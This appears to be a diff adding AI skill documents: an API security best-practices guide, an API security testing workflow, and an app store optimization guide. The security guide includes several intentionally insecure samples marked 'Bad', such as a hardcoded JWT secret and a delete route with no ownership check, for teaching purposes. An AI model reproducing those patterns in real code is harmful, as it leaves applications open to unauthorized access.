||||
|
||||
### Advanced: Per-User Rate Limiting
|
||||
|
||||
\`\`\`javascript
|
||||
// Different limits based on user tier
|
||||
function createTieredRateLimiter() {
|
||||
const limits = {
|
||||
free: { windowMs: 60 * 60 * 1000, max: 100 },
|
||||
pro: { windowMs: 60 * 60 * 1000, max: 1000 },
|
||||
enterprise: { windowMs: 60 * 60 * 1000, max: 10000 }
|
||||
};
|
||||
|
||||
return async (req, res, next) => {
|
||||
const user = req.user;
|
||||
const tier = user?.tier || 'free';
|
||||
const limit = limits[tier];
|
||||
|
||||
const key = \`rl:user:\${user.userId}\`;
|
||||
const current = await redis.incr(key);
|
||||
|
||||
if (current === 1) {
|
||||
await redis.expire(key, limit.windowMs / 1000);
|
||||
}
|
||||
|
||||
if (current > limit.max) {
|
||||
return res.status(429).json({
|
||||
error: 'Rate limit exceeded',
|
||||
limit: limit.max,
|
||||
remaining: 0,
|
||||
reset: await redis.ttl(key)
|
||||
});
|
||||
}
|
||||
|
||||
// Set rate limit headers
|
||||
res.set({
|
||||
'X-RateLimit-Limit': limit.max,
|
||||
'X-RateLimit-Remaining': limit.max - current,
|
||||
'X-RateLimit-Reset': await redis.ttl(key)
|
||||
});
|
||||
|
||||
next();
|
||||
};
|
||||
}
|
||||
|
||||
app.use('/api/', authenticateToken, createTieredRateLimiter());
|
||||
\`\`\`
|
||||
|
||||
### DDoS Protection with Helmet
|
||||
|
||||
\`\`\`javascript
|
||||
const helmet = require('helmet');
|
||||
|
||||
app.use(helmet({
|
||||
// Content Security Policy
|
||||
contentSecurityPolicy: {
|
||||
directives: {
|
||||
defaultSrc: ["'self'"],
|
||||
styleSrc: ["'self'", "'unsafe-inline'"],
|
||||
scriptSrc: ["'self'"],
|
||||
imgSrc: ["'self'", 'data:', 'https:']
|
||||
}
|
||||
},
|
||||
// Prevent clickjacking
|
||||
frameguard: { action: 'deny' },
|
||||
// Hide X-Powered-By header
|
||||
hidePoweredBy: true,
|
||||
// Prevent MIME type sniffing
|
||||
noSniff: true,
|
||||
// Enable HSTS
|
||||
hsts: {
|
||||
maxAge: 31536000,
|
||||
includeSubDomains: true,
|
||||
preload: true
|
||||
}
|
||||
}));
|
||||
\`\`\`
|
||||
|
||||
### Rate Limit Response Headers
|
||||
|
||||
\`\`\`
|
||||
X-RateLimit-Limit: 100
|
||||
X-RateLimit-Remaining: 87
|
||||
X-RateLimit-Reset: 1640000000
|
||||
Retry-After: 900
|
||||
\`\`\`
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### ✅ Do This
|
||||
|
||||
- **Use HTTPS Everywhere** - Never send sensitive data over HTTP
|
||||
- **Implement Authentication** - Require authentication for protected endpoints
|
||||
- **Validate All Inputs** - Never trust user input
|
||||
- **Use Parameterized Queries** - Prevent SQL injection
|
||||
- **Implement Rate Limiting** - Protect against brute force and DDoS
|
||||
- **Hash Passwords** - Use bcrypt with salt rounds >= 10
|
||||
- **Use Short-Lived Tokens** - JWT access tokens should expire quickly
|
||||
- **Implement CORS Properly** - Only allow trusted origins
|
||||
- **Log Security Events** - Monitor for suspicious activity
|
||||
- **Keep Dependencies Updated** - Regularly update packages
|
||||
- **Use Security Headers** - Implement Helmet.js
|
||||
- **Sanitize Error Messages** - Don't leak sensitive information
|
||||
|
||||
### ❌ Don't Do This
|
||||
|
||||
- **Don't Store Passwords in Plain Text** - Always hash passwords
|
||||
- **Don't Use Weak Secrets** - Use strong, random JWT secrets
|
||||
- **Don't Trust User Input** - Always validate and sanitize
|
||||
- **Don't Expose Stack Traces** - Hide error details in production
|
||||
- **Don't Use String Concatenation for SQL** - Use parameterized queries
|
||||
- **Don't Store Sensitive Data in JWT** - JWTs are not encrypted
|
||||
- **Don't Ignore Security Updates** - Update dependencies regularly
|
||||
- **Don't Use Default Credentials** - Change all default passwords
|
||||
- **Don't Disable CORS Completely** - Configure it properly instead
|
||||
- **Don't Log Sensitive Data** - Sanitize logs
|
||||
|
||||
## Common Pitfalls
|
||||
|
||||
### Problem: JWT Secret Exposed in Code
|
||||
**Symptoms:** JWT secret hardcoded or committed to Git
|
||||
**Solution:**
|
||||
\`\`\`javascript
|
||||
// ❌ Bad
|
||||
const JWT_SECRET = 'my-secret-key';
|
||||
|
||||
// ✅ Good
|
||||
const JWT_SECRET = process.env.JWT_SECRET;
|
||||
if (!JWT_SECRET) {
|
||||
throw new Error('JWT_SECRET environment variable is required');
|
||||
}
|
||||
|
||||
// Generate strong secret
|
||||
// node -e "console.log(require('crypto').randomBytes(64).toString('hex'))"
|
||||
\`\`\`
|
||||
|
||||
### Problem: Weak Password Requirements
|
||||
**Symptoms:** Users can set weak passwords like "password123"
|
||||
**Solution:**
|
||||
\`\`\`javascript
|
||||
const passwordSchema = z.string()
|
||||
.min(12, 'Password must be at least 12 characters')
|
||||
.regex(/[A-Z]/, 'Must contain uppercase letter')
|
||||
.regex(/[a-z]/, 'Must contain lowercase letter')
|
||||
.regex(/[0-9]/, 'Must contain number')
|
||||
.regex(/[^A-Za-z0-9]/, 'Must contain special character');
|
||||
|
||||
// Or use a password strength library
|
||||
const zxcvbn = require('zxcvbn');
|
||||
const result = zxcvbn(password);
|
||||
if (result.score < 3) {
|
||||
return res.status(400).json({
|
||||
error: 'Password too weak',
|
||||
suggestions: result.feedback.suggestions
|
||||
});
|
||||
}
|
||||
\`\`\`
|
||||
|
||||
### Problem: Missing Authorization Checks
|
||||
**Symptoms:** Users can access resources they shouldn't
|
||||
**Solution:**
|
||||
\`\`\`javascript
|
||||
// ❌ Bad: Only checks authentication
|
||||
app.delete('/api/posts/:id', authenticateToken, async (req, res) => {
|
||||
await prisma.post.delete({ where: { id: req.params.id } });
|
||||
res.json({ success: true });
|
||||
});
|
||||
|
||||
// ✅ Good: Checks both authentication and authorization
|
||||
app.delete('/api/posts/:id', authenticateToken, async (req, res) => {
|
||||
const post = await prisma.post.findUnique({
|
||||
where: { id: req.params.id }
|
||||
});
|
||||
|
||||
if (!post) {
|
||||
return res.status(404).json({ error: 'Post not found' });
|
||||
}
|
||||
|
||||
// Check if user owns the post or is admin
|
||||
if (post.userId !== req.user.userId && req.user.role !== 'admin') {
|
||||
return res.status(403).json({
|
||||
error: 'Not authorized to delete this post'
|
||||
});
|
||||
}
|
||||
|
||||
await prisma.post.delete({ where: { id: req.params.id } });
|
||||
res.json({ success: true });
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
### Problem: Verbose Error Messages
|
||||
**Symptoms:** Error messages reveal system details
|
||||
**Solution:**
|
||||
\`\`\`javascript
|
||||
// ❌ Bad: Exposes database details
|
||||
app.post('/api/users', async (req, res) => {
|
||||
try {
|
||||
const user = await prisma.user.create({ data: req.body });
|
||||
res.json(user);
|
||||
} catch (error) {
|
||||
res.status(500).json({ error: error.message });
|
||||
// Error: "Unique constraint failed on the fields: (`email`)"
|
||||
}
|
||||
});
|
||||
|
||||
// ✅ Good: Generic error message
|
||||
app.post('/api/users', async (req, res) => {
|
||||
try {
|
||||
const user = await prisma.user.create({ data: req.body });
|
||||
res.json(user);
|
||||
} catch (error) {
|
||||
console.error('User creation error:', error); // Log full error
|
||||
|
||||
if (error.code === 'P2002') {
|
||||
return res.status(400).json({
|
||||
error: 'Email already exists'
|
||||
});
|
||||
}
|
||||
|
||||
res.status(500).json({
|
||||
error: 'An error occurred while creating user'
|
||||
});
|
||||
}
|
||||
});
|
||||
\`\`\`
|
||||
|
||||
## Security Checklist
|
||||
|
||||
### Authentication & Authorization
|
||||
- [ ] Implement strong authentication (JWT, OAuth 2.0)
|
||||
- [ ] Use HTTPS for all endpoints
|
||||
- [ ] Hash passwords with bcrypt (salt rounds >= 10)
|
||||
- [ ] Implement token expiration
|
||||
- [ ] Add refresh token mechanism
|
||||
- [ ] Verify user authorization for each request
|
||||
- [ ] Implement role-based access control (RBAC)
|
||||
|
||||
### Input Validation
|
||||
- [ ] Validate all user inputs
|
||||
- [ ] Use parameterized queries or ORM
|
||||
- [ ] Sanitize HTML content
|
||||
- [ ] Validate file uploads
|
||||
- [ ] Implement request schema validation
|
||||
- [ ] Use allowlists, not blocklists
|
||||
|
||||
### Rate Limiting & DDoS Protection
|
||||
- [ ] Implement rate limiting per user/IP
|
||||
- [ ] Add stricter limits for auth endpoints
|
||||
- [ ] Use Redis for distributed rate limiting
|
||||
- [ ] Return proper rate limit headers
|
||||
- [ ] Implement request throttling
|
||||
|
||||
### Data Protection
|
||||
- [ ] Use HTTPS/TLS for all traffic
|
||||
- [ ] Encrypt sensitive data at rest
|
||||
- [ ] Don't store sensitive data in JWT
|
||||
- [ ] Sanitize error messages
|
||||
- [ ] Implement proper CORS configuration
|
||||
- [ ] Use security headers (Helmet.js)
|
||||
|
||||
### Monitoring & Logging
|
||||
- [ ] Log security events
|
||||
- [ ] Monitor for suspicious activity
|
||||
- [ ] Set up alerts for failed auth attempts
|
||||
- [ ] Track API usage patterns
|
||||
- [ ] Don't log sensitive data
|
||||
|
||||
## OWASP API Security Top 10
|
||||
|
||||
1. **Broken Object Level Authorization** - Always verify user can access resource
|
||||
2. **Broken Authentication** - Implement strong authentication mechanisms
|
||||
3. **Broken Object Property Level Authorization** - Validate which properties user can access
|
||||
4. **Unrestricted Resource Consumption** - Implement rate limiting and quotas
|
||||
5. **Broken Function Level Authorization** - Verify user role for each function
|
||||
6. **Unrestricted Access to Sensitive Business Flows** - Protect critical workflows
|
||||
7. **Server Side Request Forgery (SSRF)** - Validate and sanitize URLs
|
||||
8. **Security Misconfiguration** - Use security best practices and headers
|
||||
9. **Improper Inventory Management** - Document and secure all API endpoints
|
||||
10. **Unsafe Consumption of APIs** - Validate data from third-party APIs
|
||||
|
||||
## Related Skills
|
||||
|
||||
- `@ethical-hacking-methodology` - Security testing perspective
|
||||
- `@sql-injection-testing` - Testing for SQL injection
|
||||
- `@xss-html-injection` - Testing for XSS vulnerabilities
|
||||
- `@broken-authentication` - Authentication vulnerabilities
|
||||
- `@backend-dev-guidelines` - Backend development standards
|
||||
- `@systematic-debugging` - Debug security issues
|
||||
|
||||
## Additional Resources
|
||||
|
||||
- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
|
||||
- [JWT Best Practices](https://tools.ietf.org/html/rfc8725)
|
||||
- [Express Security Best Practices](https://expressjs.com/en/advanced/best-practice-security.html)
|
||||
- [Node.js Security Checklist](https://blog.risingstack.com/node-js-security-checklist/)
|
||||
- [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)
|
||||
|
||||
---
|
||||
|
||||
**Pro Tip:** Security is not a one-time task - regularly audit your APIs, keep dependencies updated, and stay informed about new vulnerabilities!
|
||||
171
packages/llm/skills/api-security-testing/SKILL.md
Normal file
171
packages/llm/skills/api-security-testing/SKILL.md
Normal file
@ -0,0 +1,171 @@
|
||||
---
|
||||
name: api-security-testing
|
||||
description: "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices."
|
||||
category: granular-workflow-bundle
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Security Testing Workflow
|
||||
|
||||
## Overview
|
||||
|
||||
Specialized workflow for testing REST and GraphQL API security including authentication, authorization, rate limiting, input validation, and API-specific vulnerabilities.
|
||||
|
||||
## When to Use This Workflow
|
||||
|
||||
Use this workflow when:
|
||||
- Testing REST API security
|
||||
- Assessing GraphQL endpoints
|
||||
- Validating API authentication
|
||||
- Testing API rate limiting
|
||||
- Bug bounty API testing
|
||||
|
||||
## Workflow Phases
|
||||
|
||||
### Phase 1: API Discovery
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-fuzzing-bug-bounty` - API fuzzing
|
||||
- `scanning-tools` - API scanning
|
||||
|
||||
#### Actions
|
||||
1. Enumerate endpoints
|
||||
2. Document API methods
|
||||
3. Identify parameters
|
||||
4. Map data flows
|
||||
5. Review documentation
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-fuzzing-bug-bounty to discover API endpoints
|
||||
```
|
||||
|
||||
### Phase 2: Authentication Testing
|
||||
|
||||
#### Skills to Invoke
|
||||
- `broken-authentication` - Auth testing
|
||||
- `api-security-best-practices` - API auth
|
||||
|
||||
#### Actions
|
||||
1. Test API key validation
|
||||
2. Test JWT tokens
|
||||
3. Test OAuth2 flows
|
||||
4. Test token expiration
|
||||
5. Test refresh tokens
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @broken-authentication to test API authentication
|
||||
```
|
||||
|
||||
### Phase 3: Authorization Testing
|
||||
|
||||
#### Skills to Invoke
|
||||
- `idor-testing` - IDOR testing
|
||||
|
||||
#### Actions
|
||||
1. Test object-level authorization
|
||||
2. Test function-level authorization
|
||||
3. Test role-based access
|
||||
4. Test privilege escalation
|
||||
5. Test multi-tenant isolation
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @idor-testing to test API authorization
|
||||
```
|
||||
|
||||
### Phase 4: Input Validation
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-fuzzing-bug-bounty` - API fuzzing
|
||||
- `sql-injection-testing` - Injection testing
|
||||
|
||||
#### Actions
|
||||
1. Test parameter validation
|
||||
2. Test SQL injection
|
||||
3. Test NoSQL injection
|
||||
4. Test command injection
|
||||
5. Test XXE injection
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-fuzzing-bug-bounty to fuzz API parameters
|
||||
```
|
||||
|
||||
### Phase 5: Rate Limiting
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-security-best-practices` - Rate limiting
|
||||
|
||||
#### Actions
|
||||
1. Test rate limit headers
|
||||
2. Test brute force protection
|
||||
3. Test resource exhaustion
|
||||
4. Test bypass techniques
|
||||
5. Document limitations
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-security-best-practices to test rate limiting
|
||||
```
|
||||
|
||||
### Phase 6: GraphQL Testing
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-fuzzing-bug-bounty` - GraphQL fuzzing
|
||||
|
||||
#### Actions
|
||||
1. Test introspection
|
||||
2. Test query depth
|
||||
3. Test query complexity
|
||||
4. Test batch queries
|
||||
5. Test field suggestions
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-fuzzing-bug-bounty to test GraphQL security
|
||||
```
|
||||
|
||||
### Phase 7: Error Handling
|
||||
|
||||
#### Skills to Invoke
|
||||
- `api-security-best-practices` - Error handling
|
||||
|
||||
#### Actions
|
||||
1. Test error messages
|
||||
2. Check information disclosure
|
||||
3. Test stack traces
|
||||
4. Verify logging
|
||||
5. Document findings
|
||||
|
||||
#### Copy-Paste Prompts
|
||||
```
|
||||
Use @api-security-best-practices to audit API error handling
|
||||
```
|
||||
|
||||
## API Security Checklist
|
||||
|
||||
- [ ] Authentication working
|
||||
- [ ] Authorization enforced
|
||||
- [ ] Input validated
|
||||
- [ ] Rate limiting active
|
||||
- [ ] Errors sanitized
|
||||
- [ ] Logging enabled
|
||||
- [ ] CORS configured
|
||||
- [ ] HTTPS enforced
|
||||
|
||||
## Quality Gates
|
||||
|
||||
- [ ] All endpoints tested
|
||||
- [ ] Vulnerabilities documented
|
||||
- [ ] Remediation provided
|
||||
- [ ] Report generated
|
||||
|
||||
## Related Workflow Bundles
|
||||
|
||||
- `security-audit` - Security auditing
|
||||
- `web-security-testing` - Web security
|
||||
- `api-development` - API development
|
||||
281
packages/llm/skills/app-store-optimization/HOW_TO_USE.md
Normal file
281
packages/llm/skills/app-store-optimization/HOW_TO_USE.md
Normal file
@ -0,0 +1,281 @@
|
||||
# How to Use the App Store Optimization Skill
|
||||
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you help me optimize my app's presence on the App Store and Google Play?
|
||||
|
||||
## Example Invocations
|
||||
|
||||
### Keyword Research
|
||||
|
||||
**Example 1: Basic Keyword Research**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for my productivity app? I'm targeting professionals who need task management and team collaboration features.
|
||||
```
|
||||
|
||||
**Example 2: Competitive Keyword Analysis**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze keywords that Todoist, Asana, and Monday.com are using? I want to find gaps and opportunities for my project management app.
|
||||
```
|
||||
|
||||
### Metadata Optimization
|
||||
|
||||
**Example 3: Optimize App Title**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app title for the Apple App Store? My app is called "TaskFlow" and I want to rank for "task manager", "productivity", and "team collaboration". The title needs to be under 30 characters.
|
||||
```
|
||||
|
||||
**Example 4: Full Metadata Package**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you create optimized metadata for both Apple App Store and Google Play Store? Here's my app info:
|
||||
- Name: TaskFlow
|
||||
- Category: Productivity
|
||||
- Key features: AI task prioritization, team collaboration, calendar integration
|
||||
- Target keywords: task manager, productivity app, team tasks
|
||||
```
|
||||
|
||||
### Competitor Analysis
|
||||
|
||||
**Example 5: Analyze Top Competitors**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of the top 5 productivity apps in the App Store? I want to understand their title strategies, keyword usage, and visual asset approaches.
|
||||
```
|
||||
|
||||
**Example 6: Identify Competitive Gaps**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you compare my app's ASO performance against competitors and identify what I'm missing? Here's my current metadata: [paste metadata]
|
||||
```
|
||||
|
||||
### ASO Score Calculation
|
||||
|
||||
**Example 7: Calculate Overall ASO Health**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's ASO health score? Here are my metrics:
|
||||
- Average rating: 4.2 stars
|
||||
- Total ratings: 3,500
|
||||
- Keywords in top 10: 3
|
||||
- Keywords in top 50: 12
|
||||
- Conversion rate: 4.5%
|
||||
```
|
||||
|
||||
**Example 8: Identify Improvement Areas**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. My ASO score is 62/100. Can you tell me which areas I should focus on first to improve my rankings and downloads?
|
||||
```
|
||||
|
||||
### A/B Testing
|
||||
|
||||
**Example 9: Plan Icon Test**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test two different app icons. My current conversion rate is 5%. Can you help me plan the test, calculate required sample size, and determine how long to run it?
|
||||
```
|
||||
|
||||
**Example 10: Analyze Test Results**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my A/B test results?
|
||||
- Variant A (control): 2,500 visitors, 125 installs
|
||||
- Variant B (new icon): 2,500 visitors, 150 installs
|
||||
Is this statistically significant? Should I implement variant B?
|
||||
```
|
||||
|
||||
### Localization
|
||||
|
||||
**Example 11: Plan Localization Strategy**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. I currently only have English metadata. Which markets should I localize for first? I'm a bootstrapped startup with moderate budget.
|
||||
```
|
||||
|
||||
**Example 12: Translate Metadata**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you help me translate my app metadata to Spanish for the Mexico market? Here's my English metadata: [paste metadata]. Check if it fits within character limits.
|
||||
```
|
||||
|
||||
### Review Analysis
|
||||
|
||||
**Example 13: Analyze User Reviews**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my recent reviews and tell me:
|
||||
- Overall sentiment (positive/negative ratio)
|
||||
- Most common complaints
|
||||
- Most requested features
|
||||
- Bugs that need immediate fixing
|
||||
```
|
||||
|
||||
**Example 14: Generate Review Response Templates**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you create professional response templates for:
|
||||
- Users reporting crashes
|
||||
- Feature requests
|
||||
- Positive 5-star reviews
|
||||
- General complaints
|
||||
```
|
||||
|
||||
### Launch Planning
|
||||
|
||||
**Example 15: Pre-Launch Checklist**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for both Apple App Store and Google Play Store? My launch date is December 1, 2025.
|
||||
```
|
||||
|
||||
**Example 16: Optimize Launch Timing**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. What's the best day and time to launch my fitness app? I want to maximize visibility and downloads in the first week.
|
||||
```
|
||||
|
||||
**Example 17: Plan Seasonal Campaign**
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you identify seasonal opportunities for my fitness app? It's currently October—what campaigns should I run for the next 6 months?
|
||||
```
|
||||
|
||||
## What to Provide
|
||||
|
||||
### For Keyword Research
|
||||
- App name and category
|
||||
- Target audience description
|
||||
- Key features and unique value proposition
|
||||
- Competitor apps (optional)
|
||||
- Geographic markets to target
|
||||
|
||||
### For Metadata Optimization
|
||||
- Current app name
|
||||
- Platform (Apple, Google, or both)
|
||||
- Target keywords (prioritized list)
|
||||
- Key features and benefits
|
||||
- Target audience
|
||||
- Current metadata (for optimization)
|
||||
|
||||
### For Competitor Analysis
|
||||
- Your app category
|
||||
- List of competitor app names or IDs
|
||||
- Platform (Apple or Google)
|
||||
- Specific aspects to analyze (keywords, visuals, ratings)
|
||||
|
||||
### For ASO Score Calculation
|
||||
- Metadata quality metrics (title length, description length, keyword density)
|
||||
- Rating data (average rating, total ratings, recent ratings)
|
||||
- Keyword rankings (top 10, top 50, top 100 counts)
|
||||
- Conversion metrics (impression-to-install rate, downloads)
|
||||
|
||||
### For A/B Testing
|
||||
- Test type (icon, screenshot, title, description)
|
||||
- Control variant details
|
||||
- Test variant details
|
||||
- Baseline conversion rate
|
||||
- For results analysis: visitor and conversion counts for both variants
|
||||
|
||||
### For Localization
|
||||
- Current market and language
|
||||
- Budget level (low, medium, high)
|
||||
- Target number of markets
|
||||
- Current metadata text for translation
|
||||
|
||||
### For Review Analysis
|
||||
- Recent reviews (text, rating, date)
|
||||
- Platform (Apple or Google)
|
||||
- Time period to analyze
|
||||
- Specific focus (bugs, features, sentiment)
|
||||
|
||||
### For Launch Planning
|
||||
- Platform (Apple, Google, or both)
|
||||
- Target launch date
|
||||
- App category
|
||||
- App information (name, features, target audience)
|
||||
|
||||
## What You'll Get
|
||||
|
||||
### Keyword Research Output
|
||||
- Prioritized keyword list with search volume estimates
|
||||
- Competition level analysis
|
||||
- Relevance scores
|
||||
- Long-tail keyword opportunities
|
||||
- Strategic recommendations
|
||||
|
||||
### Metadata Optimization Output
|
||||
- Optimized titles (multiple options)
|
||||
- Optimized descriptions (short and full)
|
||||
- Keyword field optimization (Apple)
|
||||
- Character count validation
|
||||
- Keyword density analysis
|
||||
- Before/after comparison
|
||||
|
||||
### Competitor Analysis Output
|
||||
- Ranked competitors by ASO strength
|
||||
- Common keyword patterns
|
||||
- Keyword gaps and opportunities
|
||||
- Visual asset assessment
|
||||
- Best practices identified
|
||||
- Actionable recommendations
|
||||
|
||||
### ASO Score Output
|
||||
- Overall score (0-100)
|
||||
- Breakdown by category (metadata, ratings, keywords, conversion)
|
||||
- Strengths and weaknesses
|
||||
- Prioritized action items
|
||||
- Expected impact of improvements
|
||||
|
||||
### A/B Test Output
|
||||
- Test design with hypothesis
|
||||
- Required sample size calculation
|
||||
- Duration estimates
|
||||
- Statistical significance analysis
|
||||
- Implementation recommendations
|
||||
- Learnings and insights
|
||||
|
||||
### Localization Output
|
||||
- Prioritized target markets
|
||||
- Estimated translation costs
|
||||
- ROI projections
|
||||
- Character limit validation for each language
|
||||
- Cultural adaptation recommendations
|
||||
- Phased implementation plan
|
||||
|
||||
### Review Analysis Output
|
||||
- Sentiment distribution (positive/neutral/negative)
|
||||
- Common themes and topics
|
||||
- Top issues requiring fixes
|
||||
- Most requested features
|
||||
- Response templates
|
||||
- Trend analysis over time
|
||||
|
||||
### Launch Planning Output
|
||||
- Platform-specific checklists (Apple, Google, Universal)
|
||||
- Timeline with milestones
|
||||
- Compliance validation
|
||||
- Optimal launch timing recommendations
|
||||
- Seasonal campaign opportunities
|
||||
- Update cadence planning
|
||||
|
||||
## Tips for Best Results
|
||||
|
||||
1. **Be Specific**: Provide as much detail about your app as possible
|
||||
2. **Include Context**: Share your goals (increase downloads, improve ranking, boost conversion)
|
||||
3. **Provide Data**: Real metrics enable more accurate analysis
|
||||
4. **Iterate**: Start with keyword research, then optimize metadata, then test
|
||||
5. **Track Results**: Monitor changes after implementing recommendations
|
||||
6. **Stay Compliant**: Always verify recommendations against current App Store/Play Store guidelines
|
||||
7. **Test First**: Use A/B testing before making major metadata changes
|
||||
8. **Localize Strategically**: Start with highest-ROI markets first
|
||||
9. **Respond to Reviews**: Use provided templates to engage with users
|
||||
10. **Plan Ahead**: Use launch checklists and timelines to avoid last-minute rushes
|
||||
|
||||
## Common Workflows
|
||||
|
||||
### New App Launch
|
||||
1. Keyword research → Competitor analysis → Metadata optimization → Pre-launch checklist → Launch timing optimization
|
||||
|
||||
### Improving Existing App
|
||||
1. ASO score calculation → Identify gaps → Metadata optimization → A/B testing → Review analysis → Implement changes
|
||||
|
||||
### International Expansion
|
||||
1. Localization planning → Market prioritization → Metadata translation → ROI analysis → Phased rollout
|
||||
|
||||
### Ongoing Optimization
|
||||
1. Monthly keyword ranking tracking → Quarterly metadata updates → Continuous A/B testing → Review monitoring → Seasonal campaigns
|
||||
|
||||
## Need Help?
|
||||
|
||||
If you need clarification on any aspect of ASO or want to combine multiple analyses, just ask! For example:
|
||||
|
||||
```
|
||||
Hey Claude—I just added the "app-store-optimization" skill. Can you create a complete ASO strategy for my new productivity app? I need keyword research, optimized metadata for both stores, a pre-launch checklist, and launch timing recommendations.
|
||||
```
|
||||
|
||||
The skill can handle comprehensive, multi-phase ASO projects as well as specific tactical optimizations.
|
||||
430
packages/llm/skills/app-store-optimization/README.md
Normal file
430
packages/llm/skills/app-store-optimization/README.md
Normal file
@ -0,0 +1,430 @@
|
||||
# App Store Optimization (ASO) Skill
|
||||
|
||||
**Version**: 1.0.0
|
||||
**Last Updated**: November 7, 2025
|
||||
**Author**: Claude Skills Factory
|
||||
|
||||
## Overview
|
||||
|
||||
A comprehensive App Store Optimization (ASO) skill that provides complete capabilities for researching, optimizing, and tracking mobile app performance on the Apple App Store and Google Play Store. This skill empowers app developers and marketers to maximize their app's visibility, downloads, and success in competitive app marketplaces.
|
||||
|
||||
## What This Skill Does
|
||||
|
||||
This skill provides end-to-end ASO capabilities across seven key areas:
|
||||
|
||||
1. **Research & Analysis**: Keyword research, competitor analysis, market trends, review sentiment
|
||||
2. **Metadata Optimization**: Title, description, keywords with platform-specific character limits
|
||||
3. **Conversion Optimization**: A/B testing framework, visual asset optimization
|
||||
4. **Rating & Review Management**: Sentiment analysis, response strategies, issue identification
|
||||
5. **Launch & Update Strategies**: Pre-launch checklists, timing optimization, update planning
|
||||
6. **Analytics & Tracking**: ASO scoring, keyword rankings, performance benchmarking
|
||||
7. **Localization**: Multi-language strategy, translation management, ROI analysis
|
||||
|
||||
## Key Features
|
||||
|
||||
### Comprehensive Keyword Research
|
||||
- Search volume and competition analysis
|
||||
- Long-tail keyword discovery
|
||||
- Competitor keyword extraction
|
||||
- Keyword difficulty scoring
|
||||
- Strategic prioritization
|
||||
|
||||
### Platform-Specific Metadata Optimization
|
||||
- **Apple App Store**:
|
||||
- Title (30 chars)
|
||||
- Subtitle (30 chars)
|
||||
- Promotional Text (170 chars)
|
||||
- Description (4000 chars)
|
||||
- Keywords field (100 chars)
|
||||
- **Google Play Store**:
|
||||
- Title (50 chars)
|
||||
- Short Description (80 chars)
|
||||
- Full Description (4000 chars)
|
||||
- Character limit validation
|
||||
- Keyword density analysis
|
||||
- Multiple optimization strategies
|
||||
|
||||
### Competitor Intelligence
|
||||
- Automated competitor discovery
|
||||
- Metadata strategy analysis
|
||||
- Visual asset assessment
|
||||
- Gap identification
|
||||
- Competitive positioning
|
||||
|
||||
### ASO Health Scoring
|
||||
- 0-100 overall score
|
||||
- Four-category breakdown (Metadata, Ratings, Keywords, Conversion)
|
||||
- Strengths and weaknesses identification
|
||||
- Prioritized action recommendations
|
||||
- Expected impact estimates
|
||||
|
||||
### Scientific A/B Testing
|
||||
- Test design and hypothesis formulation
|
||||
- Sample size calculation
|
||||
- Statistical significance analysis
|
||||
- Duration estimation
|
||||
- Implementation recommendations
|
||||
|
||||
### Global Localization
|
||||
- Market prioritization (Tier 1/2/3)
|
||||
- Translation cost estimation
|
||||
- Character limit adaptation by language
|
||||
- Cultural keyword considerations
|
||||
- ROI analysis
|
||||
|
||||
### Review Intelligence
|
||||
- Sentiment analysis
|
||||
- Common theme extraction
|
||||
- Bug and issue identification
|
||||
- Feature request clustering
|
||||
- Professional response templates
|
||||
|
||||
### Launch Planning
|
||||
- Platform-specific checklists
|
||||
- Timeline generation
|
||||
- Compliance validation
|
||||
- Optimal timing recommendations
|
||||
- Seasonal campaign planning
|
||||
|
||||
## Python Modules
|
||||
|
||||
This skill includes 8 powerful Python modules:
|
||||
|
||||
### 1. keyword_analyzer.py
|
||||
**Purpose**: Analyzes keywords for search volume, competition, and relevance
|
||||
|
||||
**Key Functions**:
|
||||
- `analyze_keyword()`: Single keyword analysis
|
||||
- `compare_keywords()`: Multi-keyword comparison and ranking
|
||||
- `find_long_tail_opportunities()`: Generate long-tail variations
|
||||
- `calculate_keyword_density()`: Analyze keyword usage in text
|
||||
- `extract_keywords_from_text()`: Extract keywords from reviews/descriptions
|
||||
|
||||
### 2. metadata_optimizer.py
|
||||
**Purpose**: Optimizes titles, descriptions, keywords with character limit validation
|
||||
|
||||
**Key Functions**:
|
||||
- `optimize_title()`: Generate optimal title options
|
||||
- `optimize_description()`: Create conversion-focused descriptions
|
||||
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
|
||||
